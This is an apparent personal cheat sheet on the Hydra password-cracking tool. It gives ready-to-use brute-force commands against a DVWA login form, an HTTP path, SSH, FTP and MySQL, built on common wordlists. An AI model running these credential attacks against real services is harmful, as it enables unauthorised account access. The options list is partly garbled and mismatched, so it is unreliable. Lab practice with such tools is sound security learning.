Hydra

03 Aug 2022 - GRX6

hydra-pass

Web forms

To launch password attacks in forms using http-post-form and injecting the variables like ^USER^. The data in the request can be obtained using Chrome dev tools or Burpsuite.

hydra -l admin -P /usr/share/jonh/password.lst 10.0.2.6 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&login=Login:Login failed" -f

The options are:

  • -u username
  • -L user list
  • -p password
  • -P passwordList
  • -f exit at the first successful result server, where to attack service
  • t number of threads to run in parallel
  • http-post-form service.

Another example with http-get

hydra -l admin -P pass.txt $TARGET http-get /webdav

SSH

We use the ssh service.

hydra -l root -P /usr/share/wordlists/rockyou.txt.gz $TARGET ssh

FTP

hydra -t 4 -l Mike -P /usr/share/wordlists/rockyou.txt -vV $TARGET ftp

MySQL

hydra -t 4 -l root -P /usr/share/wordlists/rockyou.txt $TARGET mysql